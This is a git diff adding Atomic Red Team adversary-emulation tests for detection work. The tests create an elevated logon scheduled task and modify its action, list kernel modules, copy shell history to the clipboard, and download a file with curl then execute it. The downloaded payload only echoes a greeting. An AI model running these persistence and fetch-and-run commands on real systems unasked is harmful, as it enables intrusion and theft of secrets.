diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index 95363202..039fb5f8 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -179,3 +179,25 @@ atomic_tests: Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } cleanup_command: | Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1 +- name: PowerShell Modify A Scheduled Task + description: | + Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered. + It will first be created to spawn cmd.exe, but modified to run notepad.exe. + + Upon successful execution, powershell.exe will create a scheduled task and modify the action. + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + $Action = New-ScheduledTaskAction -Execute "cmd.exe" + $Trigger = New-ScheduledTaskTrigger -AtLogon + $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest + $Set = New-ScheduledTaskSettingsSet + $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set + Register-ScheduledTask AtomicTaskModifed -InputObject $object + $NewAction = New-ScheduledTaskAction -Execute "Notepad.exe" + Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction + cleanup_command: | + Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false >$null 2>&1 \ No newline at end of file diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 9524b68f..299bc5d2 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -325,3 +325,13 @@ atomic_tests: remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue name: powershell elevation_required: true +- name: Linux List Kernel Modules + description: | + Identify kernel modules installed. Upon successful execution stdout will display kernel modules installed on host. + supported_platforms: + - linux + executor: + command: | + sudo lsmod + sudo kmod list + name: sh \ No newline at end of file diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 09356531..f8d4689a 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -715,3 +715,23 @@ atomic_tests: command: 'wscript.exe #{vbscript_file}' cleanup_command: del Atomic-License.txt >nul 2>&1 name: command_prompt +- name: Linux Download File and Run + description: | + Utilize linux Curl to download a remote file, chmod +x it and run it. + supported_platforms: + - linux + input_arguments: + remote_url: + description: url of remote payload + type: string + default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/ + payload_name: + description: payload name + type: string + default: atomic.sh + executor: + command: | + curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name} + cleanup_command: | + del #{payload_name} + name: sh \ No newline at end of file diff --git a/atomics/T1105/src/atomic.sh b/atomics/T1105/src/atomic.sh new file mode 100644 index 00000000..0c10cdf5 --- /dev/null +++ b/atomics/T1105/src/atomic.sh @@ -0,0 +1,2 @@ +#!/bin/bash +echo "Hello From Atomic Red Team" \ No newline at end of file diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index 12bcbf94..db5a617b 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -69,3 +69,14 @@ atomic_tests: cleanup_command: | Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore name: powershell +- name: Add or copy content to clipboard with xClip + description: | + Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk. + supported_platforms: + - linux + executor: + command: | + apt install xclip -y + history | tail -n 30 | xclip -sel clip + xclip -o > history.txt + name: sh \ No newline at end of file